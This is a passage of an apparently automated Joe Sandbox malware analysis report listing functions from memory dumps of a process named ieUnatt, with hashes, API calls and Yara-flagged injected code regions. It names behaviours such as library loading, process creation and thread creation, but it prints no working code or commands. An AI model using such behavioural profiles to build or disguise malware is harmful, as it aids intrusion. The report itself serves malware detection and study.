                                                                                                              • Instruction ID: e2cd9678f0a7165ba6a1be50afb30b4b693714d35d39eb4e2537e2985cfb73bf
                                                                                                              • Opcode Fuzzy Hash: 5f487f5a3297f313b5850665135ea5f8b112e121296bcb17a0537eb2550659d7
                                                                                                              • Instruction Fuzzy Hash: 3790027520181403F1807558480560700159BD0306F55D011A2565555E8A2ADD526135
                                                                                                              Function 04EC2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 819f0004e95451ccea462e85bacddb3e511ad3e515bfd5710d1fbd2e8187257f
                                                                                                              • Instruction ID: 38022f76c5e945cfd0a921e955c3537bda61fc3d701afa090390abb44751b0a8
                                                                                                              • Opcode Fuzzy Hash: 819f0004e95451ccea462e85bacddb3e511ad3e515bfd5710d1fbd2e8187257f
                                                                                                              • Instruction Fuzzy Hash: 7090023560141502F14171584405616001A9BD0245F95D022A1525555ECA26DA93A131
                                                                                                              Function 04EC2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 7ceb3e8d3a5fc9fe1cae8f98e6c491b0f7805983a88e0c95262dba6df76de6b2
                                                                                                              • Instruction ID: 24d93346bd90f8fff0e6d4a713c5d398ea3ebc41eb05e63cb42890538aa5a12b
                                                                                                              • Opcode Fuzzy Hash: 7ceb3e8d3a5fc9fe1cae8f98e6c491b0f7805983a88e0c95262dba6df76de6b2
                                                                                                              • Instruction Fuzzy Hash: 72900235211C1042F24075684C15B0700159BD0307F55D115A0655554CC916D9625521
                                                                                                              Function 04EC2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 3372ecbb66d8078d2336ce17762fffe97f9170dc8669fee148d31ce6744851ae
                                                                                                              • Instruction ID: 03e8de840943fdd9812875219d556fe2d247bd2be7f857d5f0480d979eb942c4
                                                                                                              • Opcode Fuzzy Hash: 3372ecbb66d8078d2336ce17762fffe97f9170dc8669fee148d31ce6744851ae
                                                                                                              • Instruction Fuzzy Hash: FC900235601410426180716888459064015BFE1215755D121A0E99550D855AD9665665
                                                                                                              Function 04EC2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: e7076262ac43c2e2d48c970b9b157865b2738ba1d7c185cdc2c929714d3ff67c
                                                                                                              • Instruction ID: 3e60abf2e37604bc1d9835f16b8edd51388e511bb3fe0267c43c78ec042cfd0b
                                                                                                              • Opcode Fuzzy Hash: e7076262ac43c2e2d48c970b9b157865b2738ba1d7c185cdc2c929714d3ff67c
                                                                                                              • Instruction Fuzzy Hash: 4E90027534141442F14071584415B060015DBE1305F55D015E1565554D861ADD536126
                                                                                                              Function 04EC2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 4a877697967a1abfe3fac05dbebdb1ed0632a7ed8d2338bae6b6848ceedb0346
                                                                                                              • Instruction ID: 79aa1c83bb1dab26e7662fc20688b2940c85f2fe1d3593ca94c43b52a53b9629
                                                                                                              • Opcode Fuzzy Hash: 4a877697967a1abfe3fac05dbebdb1ed0632a7ed8d2338bae6b6848ceedb0346
                                                                                                              • Instruction Fuzzy Hash: 24900239221410022185B558060550B0455ABD6355395D015F1917590CC622D9665321
                                                                                                              Function 04EC2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8a8303f59d5d7ad906d310d0521b72c0919c047848253dfa641bbce0704b82c5
                                                                                                              • Instruction ID: 6d89c83c93862d9bfe0f6256669a5b470f294589d8e32c268d3f6085f793be85
                                                                                                              • Opcode Fuzzy Hash: 8a8303f59d5d7ad906d310d0521b72c0919c047848253dfa641bbce0704b82c5
                                                                                                              • Instruction Fuzzy Hash: BA90043D311410033145F55C07055070057DFD5355355D031F1517550CD733DD735131
                                                                                                              Function 04EC2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: c3874fbf5e0162eea78df8219f357e8bcfff9b94199ad8f878cbd7713f09801f
                                                                                                              • Instruction ID: ef71c0ec8ffd25bc99ed5e601a8d64a1127e1d8b703f38d2222cd6597d7a4195
                                                                                                              • Opcode Fuzzy Hash: c3874fbf5e0162eea78df8219f357e8bcfff9b94199ad8f878cbd7713f09801f
                                                                                                              • Instruction Fuzzy Hash: 2290023520545842F18071584405A4600259BD0309F55D011A0565694D9626DE56B661
                                                                                                              Function 04EC2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: e6e435ca200d0272752893e6eac462517ba233f6d67384318a0676fc773378a2
                                                                                                              • Instruction ID: aef571dc0ca38876b59a704d87d1dc8745d1de16a02dbf1140664c42bc136675
                                                                                                              • Opcode Fuzzy Hash: e6e435ca200d0272752893e6eac462517ba233f6d67384318a0676fc773378a2
                                                                                                              • Instruction Fuzzy Hash: 5290023520141802F1C07158440564A00159BD1305F95D015A0526654DCA16DB5A77A1
                                                                                                              Function 04EC2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 09b34bb26901a6385bffa86e27f2f4c420da1cf34d22000ab8b82a8e44598153
                                                                                                              • Instruction ID: 99e88963d1cf1830967c8ecd26743e3e6963e5c91f26e26b16305b1d1c7c633c
                                                                                                              • Opcode Fuzzy Hash: 09b34bb26901a6385bffa86e27f2f4c420da1cf34d22000ab8b82a8e44598153
                                                                                                              • Instruction Fuzzy Hash: 1990023560541802F1907158441574600159BD0305F55D011A0525654D8756DB5676A1
                                                                                                              Function 04EC2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 1219bc4d285039a7144f26e215781800075b18efaaf388f9818e6f4396dcd410
                                                                                                              • Instruction ID: a51c81d22eb900fcdc633c74c79accaba3a9449edf1821e80f142307bfb4a54e
                                                                                                              • Opcode Fuzzy Hash: 1219bc4d285039a7144f26e215781800075b18efaaf388f9818e6f4396dcd410
                                                                                                              • Instruction Fuzzy Hash: 2B90027520241003614571584415616401A9BE0205B55D021E1515590DC526D9926125
                                                                                                              Function 04EC35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: fbc6811468bc61dba2b2779268306270f961c77bb0cb2ef5e972517787f0e208
                                                                                                              • Instruction ID: 530758855489e5e77cdbfa5ac66c1a63fac4a8b0d992d2dd2cc232b7c4f19383
                                                                                                              • Opcode Fuzzy Hash: fbc6811468bc61dba2b2779268306270f961c77bb0cb2ef5e972517787f0e208
                                                                                                              • Instruction Fuzzy Hash: 9190023560551402F1407158451570610159BD0205F65D411A0925568D8796DA5265A2
                                                                                                              Function 04EC39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: c9cfb4cc0471551c223521f3a6ee9b175ce8668169bf7b0bacf818cdd6f6836c
                                                                                                              • Instruction ID: 6815f505055d4f33987b30fd46f8eb1f67c7915962f2e63f99cc6e91bcf16ecb
                                                                                                              • Opcode Fuzzy Hash: c9cfb4cc0471551c223521f3a6ee9b175ce8668169bf7b0bacf818cdd6f6836c
                                                                                                              • Instruction Fuzzy Hash: B090023524546102F190715C44056164015BBE0205F55D021A0D15594D8556D9566221
                                                                                                              Function 02D940E0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 02D941BB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                              • Opcode ID: b9dd7ee228e8f2fa18e1d13e783cd6ba2d64cd5126902265b7e6cc04117ded1e
                                                                                                              • Instruction ID: b2cf2f1ea91b14bdea315bcf9a62c4db1763404b7fc09910e402ff4d2d67b186
                                                                                                              • Opcode Fuzzy Hash: b9dd7ee228e8f2fa18e1d13e783cd6ba2d64cd5126902265b7e6cc04117ded1e
                                                                                                              • Instruction Fuzzy Hash: 743149B1600605ABDB14DFA4D884FEBBBB9FB88714F008519B6596B340D774AA41CFE0
                                                                                                              Function 02D8FB79 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeUninitialize
                                                                                                              • String ID: @J7<
                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                              • Opcode ID: de5a31385c328d8bbaf5184cb2fe0e9de137bf6faae5f28632f0df6f3a671b09
                                                                                                              • Instruction ID: 597254a57b46e5dff232870cde29fb23457254fdc943a7ef655f9550961f4101
                                                                                                              • Opcode Fuzzy Hash: de5a31385c328d8bbaf5184cb2fe0e9de137bf6faae5f28632f0df6f3a671b09
                                                                                                              • Instruction Fuzzy Hash: 403110B6A006099FDB00DF98D8809EEB7B9FF88304B508559E916A7314D775EE45CBA0
                                                                                                              Function 02D8FB80 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeUninitialize
                                                                                                              • String ID: @J7<
                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                              • Opcode ID: 3d2868bd7d8cffc8f43c45ed604541bd459a96e091fdc21a63dcd20c9be21b48
                                                                                                              • Instruction ID: 653f4a6c8846348cc9c3c0665dee4a3b2a58b8a495bceba7819b057f52c4b4d7
                                                                                                              • Opcode Fuzzy Hash: 3d2868bd7d8cffc8f43c45ed604541bd459a96e091fdc21a63dcd20c9be21b48
                                                                                                              • Instruction Fuzzy Hash: A4312FB5A0060A9FDB00DFD8D8809EEB7B9FF88304F508559EA05AB314D775EE05CBA0
                                                                                                              Function 02D84C93 Relevance: 1.6, APIs: 1, Instructions: 90libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02D84C42
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                                                              • Instruction ID: b84b6258b8d0fe04709cfc2b022b047aad59c089b130d2e8b725d4d41413c146
                                                                                                              • Opcode Fuzzy Hash: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                                                              • Instruction Fuzzy Hash: 0921BB7654928A6ACB21EBA4CC80FDEBB68EF05228F09039DE544DF382D761D800C3A1
                                                                                                              Function 02D887F9 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02D823B0,02D9860F,02D95CCF,02D82380), ref: 02D887F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: 5276fb4a1b239734d44764245dd22877f7e2356c71543ede17b0eb0ba95cc3d9
                                                                                                              • Instruction ID: 7195e4ccbcdcef6ba3fc77626ce8bcdb57d5e2f78cb48a4f5f5407f800267578
                                                                                                              • Opcode Fuzzy Hash: 5276fb4a1b239734d44764245dd22877f7e2356c71543ede17b0eb0ba95cc3d9
                                                                                                              • Instruction Fuzzy Hash: 0501A7719051086AEF10FBA1EC89F6B737DDB40714F004195F808B2280E778AE45CFA1
                                                                                                              Function 02D84BD0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02D84C42
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                                                              • Instruction ID: bc45f306ec3a50161fac60b3348ab97ed1187bf8ab0d1bb9817a689b14aa35d3
                                                                                                              • Opcode Fuzzy Hash: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                                                              • Instruction Fuzzy Hash: 5A01DEB6E4020EBBDF10EBA4DD41F9DB7799B54708F004195A90897241F671EB54CBA1
                                                                                                              Function 02D99EE0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,B416F980,?,02D8898E,00000010,?,?,?,00000044,?,00000010,02D8898E,?,B416F980,?), ref: 02D99F43
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateInternalProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 2186235152-0
                                                                                                              • Opcode ID: cf02c4cc9429ea79a6d1e96201238df87769444492242351238c87c23576e22a
                                                                                                              • Instruction ID: f2ef00f176149b7c01e2d557e008f3ecf4242031dc7dbb3f99ff8166b4bfcf90
                                                                                                              • Opcode Fuzzy Hash: cf02c4cc9429ea79a6d1e96201238df87769444492242351238c87c23576e22a
                                                                                                              • Instruction Fuzzy Hash: 080184B6204508BBCB44DE99DC81EDB77ADEF8C754F508208BA0D97241D630FD51CBA4
                                                                                                              Function 02D88A20 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02D889FC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: cb4f00e556da49cfa7235e78ec53b1c4974b33f87a0a9f7577705fee751f48d9
                                                                                                              • Instruction ID: f47837c81e88e55c7d7185ac82fe920c64d4adbac1de10e602a3d51d10e5e412
                                                                                                              • Opcode Fuzzy Hash: cb4f00e556da49cfa7235e78ec53b1c4974b33f87a0a9f7577705fee751f48d9
                                                                                                              • Instruction Fuzzy Hash: 1FF027318083585ADB20363C18895E177185B61328FA4CB90E914CA3C6F731DD16E251
                                                                                                              Function 02D79F00 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D79F45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              • Opcode ID: 1eff612db578adf7c9a658527cb72a1c0f83d5e3b372ff275e994e199846ca5b
                                                                                                              • Instruction ID: 97052c3facf50dc946209f6f4ec782fd8edcf2dcfa50f744af6c9d46a8c72f9e
                                                                                                              • Opcode Fuzzy Hash: 1eff612db578adf7c9a658527cb72a1c0f83d5e3b372ff275e994e199846ca5b
                                                                                                              • Instruction Fuzzy Hash: 8EF0307334020437D720B1A9EC02FDBA29DDB80B61F140019FA0CEA2C0E595B90186F4
                                                                                                              Function 02D889C9 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02D889FC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 7d5be2cbd9e80e73f555419667aa3204c470ad418dd8067d0d4da221e1f51528
                                                                                                              • Instruction ID: 51fdf48a91985f87b5c6b2609f79a765181a00daef79dcb51da805726647a7a5
                                                                                                              • Opcode Fuzzy Hash: 7d5be2cbd9e80e73f555419667aa3204c470ad418dd8067d0d4da221e1f51528
                                                                                                              • Instruction Fuzzy Hash: 32E02072214248ABE724BB68DC85F79334C5BC8B64F484660F818DB3C2E274EA12F570
                                                                                                              Function 02D99E50 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule
